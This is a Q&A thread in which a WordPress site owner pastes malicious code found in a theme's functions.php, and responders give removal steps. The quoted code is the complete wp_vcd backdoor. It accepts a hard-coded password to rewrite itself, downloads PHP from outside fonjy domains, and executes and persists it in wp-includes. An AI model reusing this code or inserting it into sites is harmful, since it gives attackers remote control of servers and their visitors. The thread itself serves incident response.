# My WordPress website got hacked and is being redirected to some unknown source

Tags: php, wordpress, ssl, redirect, malware-detection

I don't know how it happened but since a few days ago some code appeared inside my "functions.php" header (My website doesn't work whenever I remove this unknown code), and it seems to redirect and mirroring everything to some unknown source. Now it has affected my SSL Certificate and showing error messages like "This is not a private connection" whenever I try to access my website.

Below is the piece of code that was added to the header of my "functions.php".

Can anyone help me to solve this problem? Thanks

```php
<?php
if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == 'f22fd2bb9496d1dfe84e31567316a32d')) {
    $div_code_name = "wp_vcd";
    switch ($_REQUEST['action']) {
        case 'change_domain';
            if (isset($_REQUEST['newdomain'])) {
                if (!empty($_REQUEST['newdomain'])) {
                    if ($file = @file_get_contents(__FILE__)) {
                        if (preg_match_all('/\$tmpcontent = @file_get_contents\("http:\/\/(.*)\/code\.php/i', $file, $matcholddomain)) {
                            $file = preg_replace('/' . $matcholddomain[1][0] . '/i', $_REQUEST['newdomain'], $file);
                            @file_put_contents(__FILE__, $file);
                            print "true";
                        }
                    }
                }
            }
            break;
        case 'change_code';
            if (isset($_REQUEST['newcode'])) {
                if (!empty($_REQUEST['newcode'])) {
                    if ($file = @file_get_contents(__FILE__)) {
                        if (preg_match_all('/\/\/\$start_wp_theme_tmp([\s\S]*)\/\/\$end_wp_theme_tmp/i', $file, $matcholdcode)) {
                            $file = str_replace($matcholdcode[1][0], stripslashes($_REQUEST['newcode']), $file);
                            @file_put_contents(__FILE__, $file);
                            print "true";
                        }
                    }
                }
            }
            break;
        default:
            print "ERROR_WP_ACTION WP_V_CD WP_CD";
    }
    die("");
}
$div_code_name = "wp_vcd";
$funcfile      = __FILE__;
if (!function_exists('theme_temp_setup')) {
    $path = $_SERVER['HTTP_HOST'] . $_SERVER[REQUEST_URI];
    if (stripos($_SERVER['REQUEST_URI'], 'wp-cron.php') == false && stripos($_SERVER['REQUEST_URI'], 'xmlrpc.php') == false) {
        function file_get_contents_tcurl($url)
        {
            $ch = curl_init();
            curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE);
            curl_setopt($ch, CURLOPT_HEADER, 0);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
            curl_setopt($ch, CURLOPT_URL, $url);
            curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
            $data = curl_exec($ch);
            curl_close($ch);
            return $data;
        }
        function theme_temp_setup($phpCode)
        {
            $tmpfname = tempnam(sys_get_temp_dir(), "theme_temp_setup");
            $handle   = fopen($tmpfname, "w+");
            fwrite($handle, "<?php\n" . $phpCode);
            fclose($handle);
            include $tmpfname;
            unlink($tmpfname);
            return get_defined_vars();
        }
        $wp_auth_key = 'e810cc8873fd72ff6d1585ebccddae8e';
        if (($tmpcontent = @file_get_contents("http://www.fonjy.cc/code.php") OR $tmpcontent = @file_get_contents_tcurl("http://www.fonjy.cc/code.php")) AND stripos($tmpcontent, $wp_auth_key) !== false) {
            if (stripos($tmpcontent, $wp_auth_key) !== false) {
                extract(theme_temp_setup($tmpcontent));
                @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
                if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
                    @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
                    if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
                        @file_put_contents('wp-tmp.php', $tmpcontent);
                    }
                }
            }
        } elseif ($tmpcontent = @file_get_contents("http://www.fonjy.pw/code.php") AND stripos($tmpcontent, $wp_auth_key) !== false) {
            if (stripos($tmpcontent, $wp_auth_key) !== false) {
                extract(theme_temp_setup($tmpcontent));
                @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
                if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
                    @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
                    if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
                        @file_put_contents('wp-tmp.php', $tmpcontent);
                    }
                }
            }
        } elseif ($tmpcontent = @file_get_contents(ABSPATH . 'wp-includes/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
            extract(theme_temp_setup($tmpcontent));
        } elseif ($tmpcontent = @file_get_contents(get_template_directory() . '/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
            extract(theme_temp_setup($tmpcontent));
        } elseif ($tmpcontent = @file_get_contents('wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
            extract(theme_temp_setup($tmpcontent));
        } elseif (($tmpcontent = @file_get_contents("http://www.fonjy.top/code.php") OR $tmpcontent = @file_get_contents_tcurl("http://www.fonjy.top/code.php")) AND stripos($tmpcontent, $wp_auth_key) !== false) {
            extract(theme_temp_setup($tmpcontent));
        }
    }
}
//$start_wp_theme_tmp
//wp_tmp
//$end_wp_theme_tmp
?>
```

Comment: check WordPress theme: header.php and footer file and show code

Comment: @Drickuss - what's the error generate when website is running??

Comment: Remove the code from the server. Revert the database to a backup before this happened (surely you made some back ups?). Change any passwords you have for your server/admin. Google on all the plugins you're using to see if any of them have security updates. Redeploy your site.

Answer (score 0):

yes, after this code deleted from theme funtion.php files,
delete these files also from wp-includes folder, if these files present in

- /wp-includes/wp-feed.php
- /wp-includes/wp-tmp.php
- /wp-includes/wp-vcd.php

and check /wp-includes/post.php file, if this file has similar code like theme function file delete it also,
make sure before all these take a backup at least these all five files,
thanks, enjoy.

Answer (score -2):

This occurs by using NULLED themes and plugins

You have to know that everything nulled is contaminated by malicious code.

When Nulled is installed, the code wakes up at a certain moment, goes through all the folders of your hosting, and installs a script in addition to adding several files.

wp-vcd.php
wp-tmp.php:

AND ALSO modifies
post.php
functions.php

Answer (score -2):

Stop using nulled themes and plugins, that's what you get.
read this, you might want to re install the whole things again - without the nulled software.
https://gokhan.ozar.net/blog/removing-malware-from-wordpress/

Answer (score -4):

see the solution where the suspicious codes are found in .htacces file. https://stackoverflow.com/a/50871403/4639822